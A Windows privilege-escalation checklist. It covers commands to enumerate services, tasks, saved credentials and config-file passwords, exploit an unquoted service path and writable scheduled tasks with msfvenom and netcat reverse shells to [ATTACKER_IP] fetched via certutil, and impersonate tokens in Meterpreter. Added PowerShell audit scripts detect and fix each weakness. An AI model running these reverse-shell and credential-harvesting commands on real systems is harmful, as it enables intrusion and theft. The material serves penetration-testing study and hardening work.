Privesc Checklist

powershell -c "Get-Service"
List services.

List scheduled tasks.

cmdkey /list
List saved credentials (can’t see password).
runas /savecred /user:admin powershell.exe
Run a program with saved creds.

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Show PowerShell history from a cmd prompt (cmd expands %userprofile%; ConsoleHost_history.txt is PSReadline's history file).

type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Show PowerShell history from a PowerShell prompt ($Env:userprofile is the PowerShell form of the same variable).

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
Search for database password in IIS config.

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
Look for PuTTY proxy credentials in the registry (SimonTatham is PuTTY's author, hence the key name).

Automated Scripts

PowerUp

. .\PowerUp.ps1
Dot-source PowerUp on the target and run its checks.

Windows Exploit Suggester

On target

On attacker machine

pip install xlrd==1.2.0
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --systeminfo systeminfo.txt --database [DATE]-mssb.xls
Update the exploit database, then compare it against the target's systeminfo output (xlrd is pinned to 1.2.0 because later versions dropped .xls support).

winPEAS

winPEASx64.exe
Run winPEAS.

Sample winPEAS finding for an unquoted service path:

WiseBootAssistant( - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected YOU CAN MODIFY THIS SERVICE: AllAccess

On attacker machine

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o Wise.exe
Create a reverse shell with the name of the modifiable service.

nc -lvnp [ATTACKER_PORT]
Open a listener.

On target machine

cd "C:\Program Files (x86)\Wise"
certutil.exe -urlcache -f http://[ATTACKER_IP]:[ATTACKER_PORT]/Wise.exe Wise.exe
Download the crafted executable and place it at the point where the unquoted path contains a space.

sc.exe stop WiseBootAssistant
sc.exe query WiseBootAssistant
sc.exe start WiseBootAssistant
Restart the service so that it launches the crafted executable.
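The finding above comes down to how CreateProcess resolves an unquoted path: every prefix that ends at a space is tried as an executable before the real one. The following audit script is an added example, not code from this checklist or from winPEAS; it enumerates services with Get-CimInstance, lists the ambiguous paths for each unquoted entry, and prints the sc.exe command that quotes the binary path. The WiseBootAssistant entry in the sample input is constructed from the winPEAS line above; the function and object names are the example's own.

```powershell
# Added example (not from the page or from winPEAS): find services whose binary
# path is unquoted and contains spaces, list the paths CreateProcess would try
# before the real one, and emit the sc.exe command that fixes the entry.
function Get-UnquotedServicePath {
    param(
        # Objects with Name and PathName. Defaults to the live service list;
        # pass constructed objects to run the logic offline.
        [object[]]$Services = (Get-CimInstance -ClassName Win32_Service)
    )
    foreach ($svc in $Services) {
        $path = [string]$svc.PathName
        if (-not $path -or $path.StartsWith('"')) { continue }   # empty or already quoted

        # Keep only the executable part; anything after ".exe" is arguments.
        $exeEnd = $path.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
        if ($exeEnd -lt 0) { continue }
        $exePath   = $path.Substring(0, $exeEnd + 4)
        $arguments = $path.Substring($exeEnd + 4).Trim()
        if ($exePath -notmatch ' ') { continue }                  # no space: not ambiguous

        # Each prefix that ends at a space is a file Windows would try first.
        $parts = $exePath -split ' '
        $candidates = for ($i = 0; $i -lt $parts.Count - 1; $i++) {
            ($parts[0..$i] -join ' ') + '.exe'
        }

        # Fix: quote the executable, then re-append the original arguments.
        $fixed = ('"{0}"' -f $exePath)
        if ($arguments) { $fixed += ' ' + $arguments }
        [pscustomobject]@{
            Name       = $svc.Name
            PathName   = $path
            Candidates = $candidates
            # Escaped for cmd.exe, where sc.exe needs the inner quotes preserved.
            FixCommand = ('sc.exe config {0} binPath= "{1}"' -f $svc.Name, $fixed.Replace('"', '\"'))
        }
    }
}

# Constructed sample input (not taken from a real host) so the function can be
# exercised without touching the service database.
$sample = @(
    [pscustomobject]@{ Name = 'GoodSvc';           PathName = '"C:\Program Files\Good\svc.exe" -run' },
    [pscustomobject]@{ Name = 'WiseBootAssistant'; PathName = 'C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe' }
)
Get-UnquotedServicePath -Services $sample | Format-List

# Against the live host:  Get-UnquotedServicePath | Format-List
```

For the WiseBootAssistant sample the Candidates list is C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Wise\Wise.exe and C:\Program Files (x86)\Wise\Wise Care.exe, which is why the steps above drop a file named Wise.exe into C:\Program Files (x86)\Wise. Run the FixCommand from cmd.exe; the quoting shown is cmd's, and PowerShell's native-command argument passing would need different escaping. Quoting the path removes the ambiguity, but a directory on that path that low-privileged users can write to is still worth tightening with icacls.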


PrivescCheck

Set-ExecutionPolicy Bypass -Scope Process -Force
. .\PrivescCheck.ps1
Allow scripts for this PowerShell process only, then dot-source PrivescCheck.


Abusing Schtasks

Show Schtasks

schtasks /query /tn vulnerableTask /fo list /v
Show detailed information about the scheduled task.

cd "C:\Program Files (x86)\SystemScheduler\Events"
type [ID].INI_LOG.txt
Show the task's logs.

Replace executable

mv executedByTask.exe executedByTask.exe.bak
mv msfvenomReverseShell.exe executedByTask.exe
Replace the exe that the scheduled task executes.

Inject scheduled task

echo c:\tools\nc64.exe -e cmd.exe [ATTACKER_IP] [ATTACKER_PORT] > C:\tasks\schtask.bat
Overwrite the batch file the scheduled task runs with a reverse shell command.
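Both tricks above depend on the same misconfiguration: a task that runs as a privileged account whose action file, or the directory holding it, is writable by ordinary users. The following audit script is an added example, not code from this checklist or from PrivescCheck; it walks the non-Microsoft tasks returned by Get-ScheduledTask, expands each action's executable path, and reports any task whose action file or parent directory grants write-type rights to Everyone, Authenticated Users or BUILTIN\Users. Function names and the list of "broad" groups are the example's own choices.

```powershell
# Added example (not from the page or from PrivescCheck): flag scheduled tasks
# whose action executable, or its directory, is writable by broad groups.
$BroadGroups = 'Everyone', 'NT AUTHORITY\Authenticated Users', 'BUILTIN\Users'

function Get-BroadWriteAce {
    param([string]$Path)
    # Return the Allow ACEs that give one of the broad groups any write-type right.
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $BroadGroups -contains $_.IdentityReference.Value -and
        $_.FileSystemRights.ToString() -match 'Write|Modify|FullControl|CreateFiles|AppendData'
    }
}

function Get-RedirectableTaskAction {
    param(
        # Task objects as returned by Get-ScheduledTask; the default skips the
        # \Microsoft\ tree, which is large and maintained by Windows itself.
        [object[]]$Tasks = (Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\*' })
    )
    foreach ($task in $Tasks) {
        foreach ($action in $task.Actions) {
            $exe = $action.Execute
            if (-not $exe) { continue }            # COM-handler actions have no Execute
            # Expand %SystemRoot%-style variables and strip surrounding quotes.
            $exe = [Environment]::ExpandEnvironmentVariables($exe).Trim('"')
            # Check the file itself and the directory it lives in. A bare name such
            # as "cmd.exe" is resolved through PATH and has no parent to check here.
            $targets = @($exe)
            $parent = Split-Path -Path $exe -Parent
            if ($parent) { $targets += $parent }
            foreach ($t in $targets) {
                $aces = Get-BroadWriteAce -Path $t
                if ($aces) {
                    [pscustomobject]@{
                        Task      = $task.TaskPath + $task.TaskName
                        RunAs     = $task.Principal.UserId
                        RunLevel  = $task.Principal.RunLevel
                        Writable  = $t
                        GrantedTo = ($aces.IdentityReference.Value | Sort-Object -Unique) -join ', '
                    }
                }
            }
        }
    }
}

Get-RedirectableTaskAction | Format-Table -AutoSize
```

A task that shows up with RunAs of SYSTEM or an administrator and a Writable entry such as C:\tasks is the case the checklist exploits. The fix is either to remove the broad grant (for example icacls C:\tasks /remove:g Users) or to move the action script under a directory that only administrators can modify, then re-run the audit until the list is empty.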

Abusing Privileges

Here are the most commonly abused privileges:

  • SeImpersonatePrivilege
  • SeAssignPrimaryTokenPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

whoami /priv
Show current user privileges.
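whoami /priv only shows the current token. To see which accounts on a host hold the privileges listed above, export the local security policy with secedit and read its [Privilege Rights] section. The parser below is an added example, not code from this checklist; the secedit export format (one `SePrivilege = *SID,*SID` line per privilege) is real, while the function name and the sample export are constructed for the example.

```powershell
# Added example (not from the page): report which accounts hold the privileges
# listed above, parsed from a local security policy export.
# Produce the export (elevated):  secedit /export /cfg C:\Temp\secpol.inf
$WatchedPrivileges = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeTcbPrivilege',
    'SeBackupPrivilege', 'SeRestorePrivilege', 'SeCreateTokenPrivilege',
    'SeLoadDriverPrivilege', 'SeTakeOwnershipPrivilege', 'SeDebugPrivilege'

function ConvertFrom-PrivilegeRights {
    param(
        # Lines of a secedit .inf export. The [Privilege Rights] section holds
        # entries of the form:  SeDebugPrivilege = *S-1-5-32-544,*S-1-5-6
        [string[]]$InfLines,
        [string[]]$Privileges = $WatchedPrivileges
    )
    $inSection = $false
    foreach ($line in $InfLines) {
        if ($line -match '^\[(.+)\]') { $inSection = ($Matches[1] -eq 'Privilege Rights'); continue }
        if (-not $inSection -or $line -notmatch '^\s*(Se\w+)\s*=\s*(.*)$') { continue }
        $priv = $Matches[1]; $raw = $Matches[2]
        if ($Privileges -notcontains $priv) { continue }
        $holders = foreach ($entry in ($raw -split ',')) {
            $entry = $entry.Trim()
            if (-not $entry) { continue }
            if ($entry.StartsWith('*')) {
                # "*S-1-..." is a SID; resolve it to a name where the SAM or domain knows it,
                # otherwise keep the SID so nothing is silently dropped.
                $sid = $entry.Substring(1)
                try { (New-Object System.Security.Principal.SecurityIdentifier($sid)).Translate([System.Security.Principal.NTAccount]).Value }
                catch { $sid }
            } else { $entry }   # already a name
        }
        [pscustomobject]@{ Privilege = $priv; Holders = @($holders) }
    }
}

# Constructed sample export (not a real host's policy) so the parser runs offline.
$sampleInf = @'
[Unicode]
Unicode=yes
[Privilege Rights]
SeDebugPrivilege = *S-1-5-32-544
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-32-568
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545
[Version]
signature="$CHICAGO$"
Revision=1
'@ -split "`r?`n"

ConvertFrom-PrivilegeRights -InfLines $sampleInf | Format-Table -AutoSize
# Against a real export:  ConvertFrom-PrivilegeRights -InfLines (Get-Content C:\Temp\secpol.inf)
```

In the sample, SeShutdownPrivilege is skipped because it is not on the watched list, and SeImpersonatePrivilege resolves to Administrators, SERVICE, LOCAL SERVICE, NETWORK SERVICE and (on a host where the group exists) IIS_IUSRS. Service accounts holding SeImpersonatePrivilege are the normal case; any ordinary user or custom group appearing next to them is the finding worth investigating.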

SeDebugPrivilege and SeImpersonatePrivilege

When SeDebugPrivilege and SeImpersonatePrivilege are enabled, we can impersonate another user.

load incognito
list_tokens -g
List tokens.

impersonate_token "BUILTIN\Administrators"
Impersonate token.

To determine rights, Windows uses the primary token of the process, not the impersonated token, so we have to migrate to a process whose primary token has the permissions we need.

The safest process to pick is services.exe.

migrate 668
Migrate to process 668.

Unattended Path

Unattended Setup is the method by which OEMs (Original Equipment Manufacturers) install Windows NT in unattended mode. C:\Windows\Panther\Unattend\Unattended.xml is where user passwords are stored, base64-encoded.

type C:\Windows\Panther\Unattend\Unattended.xml
Display the unattended-setup password.
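The defensive counterpart is to find leftover answer files and remove the ones that still carry a password. The script below is an added example, not code from this checklist; it checks the path named above plus a few other commonly documented unattend locations (an assumption, since the page lists only one), and flags any file whose XML contains a <Value> element sitting next to a <PlainText> element, which is the shape the unattend schema uses for AdministratorPassword, Password and similar elements. The sample document is constructed and its Value is a placeholder, not a real credential.

```powershell
# Added example (not from the page): find leftover unattended-setup answer files,
# report whether they still contain a password element, and offer to remove them.
$UnattendCandidates = @(
    "$env:SystemRoot\Panther\Unattend\Unattended.xml",   # the path the checklist names
    "$env:SystemRoot\Panther\Unattend.xml",              # the following are assumed
    "$env:SystemRoot\Panther\Unattend\Unattend.xml",     # common locations, not from
    "$env:SystemRoot\System32\Sysprep\Unattend.xml",     # the checklist
    "$env:SystemDrive\Unattend.xml"
)

function Test-UnattendHasPassword {
    param([xml]$Doc)
    # Password-bearing elements in the unattend schema share one shape: a <Value>
    # child next to a <PlainText> child. Flag any such Value that is non-empty.
    $nodes = $Doc.SelectNodes('//*[local-name()="Value" and ../*[local-name()="PlainText"]]')
    foreach ($n in $nodes) { if ($n.InnerText.Trim()) { return $true } }
    return $false
}

function Get-LeftoverUnattendFile {
    param([string[]]$Paths = $UnattendCandidates)
    foreach ($p in $Paths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        # A file that is not well-formed XML is still reported, just not as containing a password.
        $hasPassword = try { Test-UnattendHasPassword -Doc ([xml](Get-Content -LiteralPath $p -Raw)) } catch { $false }
        [pscustomobject]@{
            Path             = $p
            ContainsPassword = $hasPassword
            SizeBytes        = (Get-Item -LiteralPath $p).Length
        }
    }
}

# Constructed sample document (not a real answer file); the Value is a placeholder.
[xml]$sample = @'
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword>
          <Value>Q09OU1RSVUNURURfU0FNUExF</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
'@
Test-UnattendHasPassword -Doc $sample        # True for the sample above

# On a real host: list the leftovers, then remove the ones that still hold a password.
Get-LeftoverUnattendFile | Format-Table -AutoSize
# Get-LeftoverUnattendFile | Where-Object ContainsPassword | Remove-Item -Confirm
```

Setup normally strips the password values once installation completes, so a file that still reports ContainsPassword is a deployment-process defect rather than something to decode and reuse; delete the file, and fix the image or deployment task sequence that left it behind so the next build does not repeat it.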